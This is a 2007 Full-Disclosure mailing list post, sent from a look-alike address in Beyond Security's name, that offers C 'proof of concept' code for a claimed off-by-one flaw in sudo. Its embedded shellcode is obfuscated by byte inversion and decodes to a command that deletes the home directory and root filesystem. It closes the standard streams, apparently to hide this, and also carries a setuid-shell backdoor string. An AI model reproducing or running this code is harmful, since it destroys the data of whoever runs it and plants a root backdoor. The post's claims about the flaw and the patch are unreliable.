[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <907993.28874.qm@web45213.mail.sp1.yahoo.com>
Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
From: Beyond Security <beyondsequritee@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: [Beyond Security] New sudo off-by-one poc exploit.
/*
* off by one ebp overwrite in sudo prompt parsing
function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been
sent
* upstream and a fix will be included in the next
sudo release
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}
____________________________________________________________________________________
Got a little couch potato?
Check out fun summer activities for kids.
http://search.yahoo.com/search?fr=oni_on_mail&p=summer+activities+for+kids&cs=bz
____________________________________________________________________________________
Looking for a deal? Find great prices on flights and hotels with Yahoo! FareChase.
http://farechase.yahoo.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists